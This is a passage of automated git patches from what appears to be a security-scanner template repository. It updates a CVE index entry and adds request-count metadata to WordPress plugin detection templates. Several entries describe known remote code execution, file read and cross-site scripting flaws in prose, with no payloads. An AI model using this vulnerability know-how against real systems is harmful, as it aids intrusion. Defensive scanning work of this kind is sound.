ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e -templates-checksum.txt:7a4903bb53f009261e5ff78350cfb15acb2e83f2 +templates-checksum.txt:e13dba8049ee09cc6d36f21aaa41581f057bee32 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 73f0951e7152a339af727e5f630094159397a071 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 9 Sep 2023 17:04:32 +0000 Subject: [PATCH 0247/1090] Auto Generated cves.json [Sat Sep 9 17:04:32 UTC 2023] :robot: --- cves.json | 2 +- cves.json-checksum.txt | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/cves.json b/cves.json index 34f5a4bcf2..811f5dd13e 100644 --- a/cves.json +++ b/cves.json @@ -615,7 +615,7 @@ {"ID":"CVE-2019-11248","Info":{"Name":"Debug Endpoint pprof - Exposure Detection","Severity":"high","Description":"The debugging endpoint /debug/pprof is exposed over the unauthenticated Kubelet healthz port. This debugging endpoint can potentially leak sensitive information such as internal Kubelet memory addresses and configuration, or for limited denial of service. Versions prior to 1.15.0, 1.14.4, 1.13.8, and 1.12.10 are affected. The issue is of medium severity, but not exposed by the default configuration.\n","Classification":{"CVSSScore":"8.2"}},"file_path":"http/cves/2019/CVE-2019-11248.yaml"} {"ID":"CVE-2019-11370","Info":{"Name":"Carel pCOWeb \u003cB1.2.4 - Cross-Site Scripting","Severity":"medium","Description":"Carel pCOWeb prior to B1.2.4 is vulnerable to stored cross-site scripting, as demonstrated by the config/pw_snmp.html \"System contact\" field.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2019/CVE-2019-11370.yaml"} {"ID":"CVE-2019-11510","Info":{"Name":"Pulse Connect Secure SSL VPN Arbitrary File Read","Severity":"critical","Description":"Pulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4 all contain an arbitrary file reading vulnerability that could allow unauthenticated remote attackers to send a specially crafted URI to gain improper access.","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2019/CVE-2019-11510.yaml"} -{"ID":"CVE-2019-11580","Info":{"Name":"Atlassian Crowd and Crowd Data Center Unauthenticated Remote Code Execution","Severity":"critical","Description":"Atlassian Crowd and Crowd Data Center is susceptible to a remote code execution vulnerability because the pdkinstall development plugin is incorrectly enabled in release builds. Attackers who can send unauthenticated or authenticated requests to a Crowd or Crowd Data Center instance can exploit this vulnerability to install arbitrary plugins, which permits remote code execution on systems running a vulnerable version of Crowd or Crowd Data Center. All versions of Crowd from version 2.1.0 before 3.0.5 (the fixed version for 3.0.x), from version 3.1.0 before 3.1.6 (the fixed version for 3.1.x),from version 3.2.0 before 3.2.8 (the fixed version for 3.2.x), from version 3.3.0 before 3.3.5 (the fixed version for 3.3.x), and from version 3.4.0 before 3.4.4 (the fixed version for 3.4.x) are affected by this vulnerability.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-11580.yaml"} +{"ID":"CVE-2019-11580","Info":{"Name":"Atlassian Crowd and Crowd Data Center - Unauthenticated Remote Code Execution","Severity":"critical","Description":"Atlassian Crowd and Crowd Data Center is susceptible to a remote code execution vulnerability because the pdkinstall development plugin is incorrectly enabled in release builds. Attackers who can send unauthenticated or authenticated requests to a Crowd or Crowd Data Center instance can exploit this vulnerability to install arbitrary plugins, which permits remote code execution on systems running a vulnerable version of Crowd or Crowd Data Center. All versions of Crowd from version 2.1.0 before 3.0.5 (the fixed version for 3.0.x), from version 3.1.0 before 3.1.6 (the fixed version for 3.1.x),from version 3.2.0 before 3.2.8 (the fixed version for 3.2.x), from version 3.3.0 before 3.3.5 (the fixed version for 3.3.x), and from version 3.4.0 before 3.4.4 (the fixed version for 3.4.x) are affected by this vulnerability.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-11580.yaml"} {"ID":"CVE-2019-11581","Info":{"Name":"Atlassian Jira Server-Side Template Injection","Severity":"critical","Description":"Jira Server and Data Center is susceptible to a server-side template injection vulnerability via the ContactAdministrators and SendBulkMail actions. An attacker is able to remotely execute code on systems that run a vulnerable version of Jira Server or Data Center. All versions of Jira Server and Data Center from 4.4.0 before 7.6.14, from 7.7.0 before 7.13.5, from 8.0.0 before 8.0.3, from 8.1.0 before 8.1.2, and from 8.2.0 before 8.2.3 are affected by this vulnerability.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-11581.yaml"} {"ID":"CVE-2019-11869","Info":{"Name":"WordPress Yuzo \u003c5.12.94 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Yuzo Related Posts plugin before 5.12.94 is vulnerable to cross-site scripting\nbecause it mistakenly expects that is_admin() verifies that the\nrequest comes from an admin user (it actually only verifies that the\nrequest is for an admin page). An unauthenticated attacker can consequently inject\na payload into the plugin settings, such as the\nyuzo_related_post_css_and_style setting.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-11869.yaml"} {"ID":"CVE-2019-12276","Info":{"Name":"GrandNode 4.40 - Local File Inclusion","Severity":"high","Description":"GrandNode 4.40 is susceptible to local file inclusion in Controllers/LetsEncryptController.cs, which allows remote unauthenticated attackers to retrieve arbitrary files on the web server via specially crafted LetsEncrypt/Index?fileName= HTTP requests.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2019/CVE-2019-12276.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index d1cf7c82fb..134236ed42 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -360a3fb55fc30d1c7add0d19334c6316 +d2b00d4103194de5082d992374a6e148 From a0df8c76ab1638bd44ff457d21ccc235501a277a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 9 Sep 2023 17:05:37 +0000 Subject: [PATCH 0248/1090] TemplateMan Update [Sat Sep 9 17:05:37 UTC 2023] :robot: --- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 + http/technologies/wordpress/plugins/add-to-any.yaml | 1 + http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 + http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 + http/technologies/wordpress/plugins/akismet.yaml | 1 + .../wordpress/plugins/all-404-redirect-to-homepage.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 + .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 + http/technologies/wordpress/plugins/amp.yaml | 1 + http/technologies/wordpress/plugins/antispam-bee.yaml | 1 + http/technologies/wordpress/plugins/astra-sites.yaml | 1 + http/technologies/wordpress/plugins/astra-widgets.yaml | 1 + http/technologies/wordpress/plugins/autoptimize.yaml | 1 + http/technologies/wordpress/plugins/backwpup.yaml | 1 + http/technologies/wordpress/plugins/better-search-replace.yaml | 1 + http/technologies/wordpress/plugins/better-wp-security.yaml | 1 + .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 + http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 + http/technologies/wordpress/plugins/breeze.yaml | 1 + http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 + .../technologies/wordpress/plugins/child-theme-configurator.yaml | 1 + http/technologies/wordpress/plugins/classic-editor.yaml | 1 + http/technologies/wordpress/plugins/classic-widgets.yaml | 1 + .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 + http/technologies/wordpress/plugins/cmb2.yaml | 1 + http/technologies/wordpress/plugins/coblocks.yaml | 1 + http/technologies/wordpress/plugins/code-snippets.yaml | 1 + http/technologies/wordpress/plugins/coming-soon.yaml | 1 + http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7.yaml | 1 + http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 + http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 + http/technologies/wordpress/plugins/cookie-notice.yaml | 1 + http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 + .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 + http/technologies/wordpress/plugins/custom-css-js.yaml | 1 + http/technologies/wordpress/plugins/custom-fonts.yaml | 1 + http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 + http/technologies/wordpress/plugins/disable-comments.yaml | 1 + http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/duplicate-page.yaml | 1 + http/technologies/wordpress/plugins/duplicate-post.yaml | 1 + http/technologies/wordpress/plugins/duplicator.yaml | 1 + .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 + http/technologies/wordpress/plugins/easy-fancybox.yaml | 1 + http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 + http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 + http/technologies/wordpress/plugins/elementor.yaml | 1 + http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 + http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 + http/technologies/wordpress/plugins/envato-elements.yaml | 1 + .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 + http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 + .../technologies/wordpress/plugins/facebook-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 + .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 + http/technologies/wordpress/plugins/flamingo.yaml | 1 + http/technologies/wordpress/plugins/fluentform.yaml | 1 + http/technologies/wordpress/plugins/font-awesome.yaml | 1 + .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/formidable.yaml | 1 + http/technologies/wordpress/plugins/forminator.yaml | 1 + http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 + http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 + .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 + .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 + http/technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 + http/technologies/wordpress/plugins/google-site-kit.yaml | 1 + .../technologies/wordpress/plugins/google-sitemap-generator.yaml | 1 + http/technologies/wordpress/plugins/gtranslate.yaml | 1 + http/technologies/wordpress/plugins/gutenberg.yaml | 1 + http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 + .../wordpress/plugins/header-footer-code-manager.yaml | 1 + http/technologies/wordpress/plugins/header-footer-elementor.yaml | 1 + http/technologies/wordpress/plugins/header-footer.yaml | 1 + http/technologies/wordpress/plugins/health-check.yaml | 1 + http/technologies/wordpress/plugins/hello-dolly.yaml | 1 + http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 + http/technologies/wordpress/plugins/imagify.yaml | 1 + http/technologies/wordpress/plugins/imsanity.yaml | 1 + .../wordpress/plugins/insert-headers-and-footers.yaml | 1 + http/technologies/wordpress/plugins/instagram-feed.yaml | 1 + .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/iwp-client.yaml | 1 + http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 + http/technologies/wordpress/plugins/jetpack.yaml | 1 + http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 + http/technologies/wordpress/plugins/kirki.yaml | 1 + http/technologies/wordpress/plugins/leadin.yaml | 1 + .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 + http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 + http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 + http/technologies/wordpress/plugins/loco-translate.yaml | 1 + http/technologies/wordpress/plugins/loginizer.yaml | 1 + http/technologies/wordpress/plugins/loginpress.yaml | 1 + .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 + http/technologies/wordpress/plugins/mailpoet.yaml | 1 + http/technologies/wordpress/plugins/maintenance.yaml | 1 + http/technologies/wordpress/plugins/mainwp-child.yaml | 1 + http/technologies/wordpress/plugins/malcare-security.yaml | 1 + http/technologies/wordpress/plugins/megamenu.yaml | 1 + http/technologies/wordpress/plugins/members.yaml | 1 + http/technologies/wordpress/plugins/meta-box.yaml | 1 + http/technologies/wordpress/plugins/ml-slider.yaml | 1 + http/technologies/wordpress/plugins/newsletter.yaml | 1 + .../technologies/wordpress/plugins/nextend-facebook-connect.yaml | 1 + http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 + http/technologies/wordpress/plugins/ninja-forms.yaml | 1 + http/technologies/wordpress/plugins/ocean-extra.yaml | 1 + http/technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 + http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 + http/technologies/wordpress/plugins/optinmonster.yaml | 1 + http/technologies/wordpress/plugins/otter-blocks.yaml | 1 + http/technologies/wordpress/plugins/password-protected.yaml | 1 + http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 + .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 + http/technologies/wordpress/plugins/polylang.yaml | 1 + http/technologies/wordpress/plugins/popup-builder.yaml | 1 + http/technologies/wordpress/plugins/popup-maker.yaml | 1 + http/technologies/wordpress/plugins/post-smtp.yaml | 1 + http/technologies/wordpress/plugins/post-types-order.yaml | 1 + .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 + http/technologies/wordpress/plugins/pretty-link.yaml | 1 + http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 + http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 + http/technologies/wordpress/plugins/redirection.yaml | 1 + http/technologies/wordpress/plugins/redux-framework.yaml | 1 + http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/safe-svg.yaml | 1 + http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 + http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 + http/technologies/wordpress/plugins/sg-security.yaml | 1 + http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 + .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 + .../technologies/wordpress/plugins/simple-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/siteguard.yaml | 1 + http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 + http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 + http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 + .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 + http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 + http/technologies/wordpress/plugins/svg-support.yaml | 1 + http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 + http/technologies/wordpress/plugins/tablepress.yaml | 1 + http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 + http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 + http/technologies/wordpress/plugins/themeisle-companion.yaml | 1 + http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 + .../wordpress/plugins/translatepress-multilingual.yaml | 1 + .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/under-construction-page.yaml | 1 + http/technologies/wordpress/plugins/updraftplus.yaml | 1 + http/technologies/wordpress/plugins/use-any-font.yaml | 1 + http/technologies/wordpress/plugins/user-role-editor.yaml | 1 + .../technologies/wordpress/plugins/velvet-blues-update-urls.yaml | 1 + http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 + .../technologies/wordpress/plugins/webp-converter-for-media.yaml | 1 + http/technologies/wordpress/plugins/webp-express.yaml | 1 + .../technologies/wordpress/plugins/widget-importer-exporter.yaml | 1 + .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 + .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 + http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 + .../plugins/woocommerce-gateway-paypal-express-checkout.yaml | 1 + .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 + .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 + .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 + http/technologies/wordpress/plugins/woocommerce.yaml | 1 + http/technologies/wordpress/plugins/wordfence.yaml | 1 + http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 + http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 + http/technologies/wordpress/plugins/worker.yaml | 1 + http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 + http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 + http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 + http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 + http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 + http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 + http/technologies/wordpress/plugins/wp-optimize.yaml | 1 + http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 + http/technologies/wordpress/plugins/wp-reset.yaml | 1 + .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 + http/technologies/wordpress/plugins/wp-rollback.yaml | 1 + http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 + http/technologies/wordpress/plugins/wp-smushit.yaml | 1 + http/technologies/wordpress/plugins/wp-statistics.yaml | 1 + http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-user-avatar.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 + http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 + http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 + http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 + .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 + 200 files changed, 200 insertions(+) diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 7cbd1855ae..ebb5ba1042 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ad-inserter/ metadata: + max-request: 1 plugin_namespace: ad-inserter wpscan: https://wpscan.com/plugin/ad-inserter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 8d579ff23d..fddfbf3118 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/add-to-any/ metadata: + max-request: 1 plugin_namespace: add-to-any wpscan: https://wpscan.com/plugin/add-to-any tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 4a6d8b7bbe..7a6e8a76ec 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/admin-menu-editor/ metadata: + max-request: 1 plugin_namespace: admin-menu-editor wpscan: https://wpscan.com/plugin/admin-menu-editor tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index e4eb308d39..940c0e614c 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/advanced-custom-fields/ metadata: + max-request: 1 plugin_namespace: advanced-custom-fields wpscan: https://wpscan.com/plugin/advanced-custom-fields tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 97f1d8c18f..06cfd4950b 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/akismet/ metadata: + max-request: 1 plugin_namespace: akismet wpscan: https://wpscan.com/plugin/akismet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml index 10f104f2c7..90aa5881fd 100644 --- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml +++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-404-redirect-to-homepage/ metadata: + max-request: 1 plugin_namespace: all-404-redirect-to-homepage wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 8addc28ded..1bf337da6c 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-seo-pack/ metadata: + max-request: 1 plugin_namespace: all-in-one-seo-pack wpscan: https://wpscan.com/plugin/all-in-one-seo-pack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 2e579621ac..7cec152555 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-migration/ metadata: + max-request: 1 plugin_namespace: all-in-one-wp-migration wpscan: https://wpscan.com/plugin/all-in-one-wp-migration tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 41e297ffeb..8a4b6133cd 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/ metadata: + max-request: 1 plugin_namespace: all-in-one-wp-security-and-firewall wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 0dd8686ec3..cfa2e3d080 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/amp/ metadata: + max-request: 1 plugin_namespace: amp wpscan: https://wpscan.com/plugin/amp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 359671f3bd..a92d9bde4e 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/antispam-bee/ metadata: + max-request: 1 plugin_namespace: antispam-bee wpscan: https://wpscan.com/plugin/antispam-bee tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 116e0c420a..59144c7dd5 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/astra-sites/ metadata: + max-request: 1 plugin_namespace: astra-sites wpscan: https://wpscan.com/plugin/astra-sites tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml index dc4703ef8d..df06ba2f35 100644 --- a/http/technologies/wordpress/plugins/astra-widgets.yaml +++ b/http/technologies/wordpress/plugins/astra-widgets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/astra-widgets/ metadata: + max-request: 1 plugin_namespace: astra-widgets wpscan: https://wpscan.com/plugin/astra-widgets tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 1426ac3ef2..2a79d529cc 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/autoptimize/ metadata: + max-request: 1 plugin_namespace: autoptimize wpscan: https://wpscan.com/plugin/autoptimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 78d1651ff4..556a113acc 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/backwpup/ metadata: + max-request: 1 plugin_namespace: backwpup wpscan: https://wpscan.com/plugin/backwpup tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index f7219b373d..58d9a9d738 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/better-search-replace/ metadata: + max-request: 1 plugin_namespace: better-search-replace wpscan: https://wpscan.com/plugin/better-search-replace tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index f688a68f72..6c9c485079 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/better-wp-security/ metadata: + max-request: 1 plugin_namespace: better-wp-security wpscan: https://wpscan.com/plugin/better-wp-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 00e95c4263..7631e87d78 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/black-studio-tinymce-widget/ metadata: + max-request: 1 plugin_namespace: black-studio-tinymce-widget wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 212b2b13c4..c7daa26ac6 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/breadcrumb-navxt/ metadata: + max-request: 1 plugin_namespace: breadcrumb-navxt wpscan: https://wpscan.com/plugin/breadcrumb-navxt tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 6318392c5c..68767e4dce 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/breeze/ metadata: + max-request: 1 plugin_namespace: breeze wpscan: https://wpscan.com/plugin/breeze tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index e1a2a186e0..073618936d 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/broken-link-checker/ metadata: + max-request: 1 plugin_namespace: broken-link-checker wpscan: https://wpscan.com/plugin/broken-link-checker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 23614882a7..6aabc19e9f 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ 